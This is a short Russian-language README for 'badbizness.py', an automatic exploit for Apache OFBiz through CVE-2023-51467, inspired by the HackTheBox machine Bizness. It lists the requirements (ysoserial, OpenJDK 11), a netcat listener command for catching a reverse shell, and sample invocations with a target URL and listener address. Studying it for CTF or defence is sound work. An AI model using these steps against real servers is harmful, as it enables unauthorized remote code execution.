
Автоэксплойт-скрипт для Java-веб-фреймворка OFBiz под CVE-2023-51467.

Скрипт автоматической эксплуатации Java-веб-фреймворка OF Biz при CVE-2023-51467. Вдохновлён машиной HackTheBox Bizness.
Для работы этого скрипта требуется инструмент ysoserial и OpenJDK версии 11. Инструкции по установке см. в меню использования.
Настройте слушатель для перехвата шелла удобным для вас способом. Пример с netcat:
nc -nlvp 1337
Запустите скрипт:
python3 badbizness.py [путь к ysoserial-all.jar] [БАЗОВЫЙ URL ЦЕЛИ] [IP СЛУШАТЕЛЯ] [ПОРТ СЛУШАТЕЛЯ]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
Этот инструмент был создан как способ узнать больше о Python. Я благодарю скрипт за помощь в изучении темы.